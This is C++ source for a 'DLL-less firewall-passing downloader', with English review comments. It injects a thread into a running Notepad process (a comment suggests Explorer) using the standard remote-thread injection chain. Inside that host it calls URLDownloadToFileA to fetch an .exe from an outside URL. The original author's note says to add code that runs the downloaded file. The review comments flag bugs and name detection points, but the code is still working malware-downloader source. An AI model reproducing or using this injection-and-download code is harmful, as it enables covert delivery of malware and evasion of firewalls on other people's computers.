无DLL 穿防火墙下载者


#include <windows.h>
#define MAXINJECTSIZE (1024*4)

// Parameter block that HideDownFile fills in and copies into the target
// process; ThreadDown reads the remote copy. It carries the strings and the
// resolved kernel32 addresses the injected thread needs, since that thread
// runs in a foreign address space and cannot use this module's imports.
struct tagDownInfo
{
 TCHAR szUrl[500];            // source URL (set by the caller, see main)
 TCHAR szFile[500];           // destination path (set by the caller)
 TCHAR szUrlmon[30];          // set to "Urlmon.dll" by HideDownFile
 TCHAR szUrlDowndToFile[30];  // set to "URLDownloadToFileA" by HideDownFile
 TCHAR szMessageBox[500];     // set to "MessageBoxA" by HideDownFile
 // NOTE(review): "User32.dll" is 10 characters; with its terminator it needs
 // 11, so the lstrcpy in HideDownFile writes one byte past this field (into
 // bIsRun on the ANSI build this code assumes). Left as on the page.
 TCHAR szUser32_lib[10];
 bool bIsRun;                 // not referenced by any code on this page
 DWORD dwRunMode;             // not referenced by any code on this page
 FARPROC funFunGetModuleHandleAddr; // kernel32!GetModuleHandleA (resolved in HideDownFile)
 FARPROC funFunGetProcAddressAddr;  // kernel32!GetProcAddress
 FARPROC funFunLoadLibraryAddr;     // kernel32!LoadLibraryA

};

bool HideDownFile(tagDownInfo* pInfo, DWORD dwProcessId);


// Thread body that HideDownFile copies raw into the target process (it writes
// MAXINJECTSIZE bytes starting at &ThreadDown) and starts with
// CreateRemoteThread. Because it executes in a foreign address space it does
// not touch this module's imports or string literals: every API is reached
// through the function pointers and name strings carried in *pInfo.
//
// lParam: remote copy of a tagDownInfo prepared by HideDownFile.
// Returns 0 unconditionally; the outcome of the download is not reported.
//
// NOTE(review): no result of pLoadLibrary / pGetProcAddress is checked, so a
// failed lookup becomes a call through NULL inside the host process.
// NOTE(review): the typedefs below do not match the real Win32 signatures
// (GetProcAddress/GetModuleHandle/LoadLibrary all typed as returning HMODULE,
// MessageBox/URLDownloadToFile as returning long); the code works only
// because every value is pointer- or int-sized, not because the types agree.
DWORD WINAPI ThreadDown(LPVOID lParam)
{

 tagDownInfo* pInfo = (tagDownInfo*)lParam;
 typedef long (__stdcall* T_MessageBox)(HWND,LPCTSTR,LPCTSTR,DWORD);
 typedef long (__stdcall* T_URLDownloadToFile)(LPVOID,LPCTSTR,LPCTSTR,DWORD, LPVOID );

 typedef HMODULE  (__stdcall* T_GetProcAddress)(HMODULE ,LPCSTR);
 typedef HMODULE  (__stdcall* T_GetModuleHandle)(LPCTSTR);
 typedef HMODULE  (__stdcall* T_LoadLibrary)(LPCTSTR);
 typedef void (__stdcall* pSleep)( DWORD dwMilliseconds); // unused on this page

 // The three key function addresses. They were resolved by HideDownFile in
 // the injecting process; they are only meaningful here if kernel32 is mapped
 // at the same address in the target (the author's assumption, not checked).
 // pGetModuleHandle is assigned but never used.
 T_GetModuleHandle pGetModuleHandle = (T_GetModuleHandle)pInfo->funFunGetModuleHandleAddr; 
 T_GetProcAddress  pGetProcAddress = (T_GetProcAddress)pInfo->funFunGetProcAddressAddr;    
 T_LoadLibrary pLoadLibrary = (T_LoadLibrary)pInfo->funFunLoadLibraryAddr;

 // user32!MessageBoxA is displayed with the URL as text and the destination
 // path as caption -- a visible artefact of the injection in the host process.
 HMODULE hUser32Dll = pLoadLibrary(pInfo->szUser32_lib );
 T_MessageBox pMessageBox =(T_MessageBox)pGetProcAddress(hUser32Dll, pInfo->szMessageBox);
 pMessageBox(NULL,  pInfo->szUrl, pInfo->szFile, 0);
 // urlmon!URLDownloadToFileA performs the transfer from inside the host
 // process, so the network activity is attributed to the host; this is the
 // "firewall-passing" idea from the page title. Its return value is ignored.
 HMODULE hDll = pLoadLibrary( pInfo->szUrlmon );

 T_URLDownloadToFile pURLDownloadToFile = (T_URLDownloadToFile)pGetProcAddress( hDll, pInfo->szUrlDowndToFile);
 pURLDownloadToFile(NULL, pInfo->szUrl, pInfo->szFile, 0, NULL);

 return 0;
}

// Copies ThreadDown and a copy of *pInfo into process dwProcessId, runs
// ThreadDown there as a remote thread and waits for it to finish.
//
// pInfo:       caller-provided block; this function fills in the DLL/export
//              name strings and the three kernel32 addresses before copying it.
// dwProcessId: id of the target process.
// Returns false when OpenProcess, either VirtualAllocEx, either
// WriteProcessMemory or CreateRemoteThread fails; true otherwise. The
// injected thread's own result is never observed.
//
// The chain OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD) ->
// VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory ->
// CreateRemoteThread is the textbook cross-process code-injection sequence;
// each step is a discrete event (handle with write rights, RWX allocation in
// another process, remote thread whose start address lies outside any loaded
// image) that endpoint telemetry and EDR rules key on.
//
// NOTE(review): hProcess is closed only on the path that reaches the end;
// every early `return false` after OpenProcess leaks it, and the two remote
// allocations leak on the later failures as well.
// NOTE(review): when CreateRemoteThread fails hThread is NULL but is still
// passed to WaitForSingleObject and CloseHandle.
bool HideDownFile(tagDownInfo* pInfo, DWORD dwProcessId)
{
 HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessId);
 if(hProcess == NULL)
  return false;

 // Addresses are resolved here, in the injecting process, and handed over in
 // the struct; ThreadDown uses them unchanged in the target. GetModuleHandle
 // and the GetProcAddress results are not checked for NULL.
 HINSTANCE hLibDll = GetModuleHandle("Kernel32.dll");

 pInfo->funFunGetProcAddressAddr = (FARPROC)GetProcAddress(hLibDll, "GetProcAddress");
 pInfo->funFunGetModuleHandleAddr = (FARPROC)GetProcAddress(hLibDll, "GetModuleHandleA");
 pInfo->funFunLoadLibraryAddr=(FARPROC)GetProcAddress(hLibDll, "LoadLibraryA");

 // Names the injected code needs travel inside the struct, presumably so that
 // ThreadDown itself carries no pointers into this module's string data.
 lstrcpy(pInfo->szUrlmon, "Urlmon.dll");
 lstrcpy(pInfo->szUrlDowndToFile, "URLDownloadToFileA");
 lstrcpy(pInfo->szMessageBox, "MessageBoxA");
 // NOTE(review): szUser32_lib is TCHAR[10]; "User32.dll" plus its terminator
 // is 11 bytes, so this copy runs one byte past the field.
 lstrcpy(pInfo->szUser32_lib, "User32.dll");

 // Allocate space: one RWX block for the code, one for the parameter block.
 // MAXINJECTSIZE (4 KB) bytes are copied starting at &ThreadDown; that only
 // yields a working copy if the compiled function fits in the span, is laid
 // out contiguously and contains no absolute addresses -- none of which is
 // verified here (an incremental-link thunk at &ThreadDown, for instance,
 // would break it).
 void *pRemoteThread = VirtualAllocEx(hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 if (! pRemoteThread)
  return false;
 tagDownInfo *pData = (tagDownInfo*)VirtualAllocEx(hProcess, 0, sizeof (tagDownInfo), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 if (!pData)
  return false;

 if (! WriteProcessMemory(hProcess, pRemoteThread, &ThreadDown, MAXINJECTSIZE, 0))
  return false;

 if (! WriteProcessMemory(hProcess, pData, pInfo, sizeof (tagDownInfo), 0))
  return false;

 bool bRet = true;
 HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, pData, 0, NULL);
 if(!hThread)
  bRet = false;

 // Blocks without timeout until the injected thread returns, then releases
 // the remote allocations. NOTE(review): VirtualFreeEx with MEM_RELEASE is
 // documented to require dwSize == 0; with a non-zero size these calls are
 // expected to fail and leave the blocks mapped -- the results are unchecked.
 WaitForSingleObject(hThread, INFINITE);
 VirtualFreeEx(hProcess, pRemoteThread, MAXINJECTSIZE, MEM_RELEASE);
 VirtualFreeEx(hProcess, pData, sizeof (tagDownInfo), MEM_RELEASE);
 // (original note) Add the code that runs the program yourself; it can also be
 // done from another thread, which only needs shell32.dll loaded in addition.
 CloseHandle(hThread);
 CloseHandle(hProcess);

 return bRet;
}

 #include <windows.h>
#include "HideDownFile.CPP"
#include "conio.h"

// Entry point: locates a Notepad window, takes its owning process as the
// target, fills in URL and destination, and calls HideDownFile. argc/argv
// are unused.
//
// NOTE(review): FindWindow's result is not checked; with no matching window
// hWnd is NULL, GetWindowThreadProcessId fails and dwProcessId -- declared
// without an initializer -- is used uninitialized. HideDownFile's return
// value is discarded, so failure of the injection is never reported.
int main(int argc, char* argv[])
{
 // ===== Obtain the process that the remote thread will be created in =====
 HWND hWnd = FindWindow("notepad", NULL); // Notepad as the example; (original note) change this to target explorer
 DWORD dwProcessId;
 ::GetWindowThreadProcessId(hWnd, &dwProcessId);
 tagDownInfo info;
 ZeroMemory(&info, sizeof(tagDownInfo));
 // Both fields are TCHAR[500]; these literals fit, but strcpy is unbounded.
 strcpy(info.szFile, "e://1.exe");
 strcpy(info.szUrl, "http://www.shineway.com/aspnet/adsl.exe");
 HideDownFile(&info, dwProcessId);
 return 0;
}
 
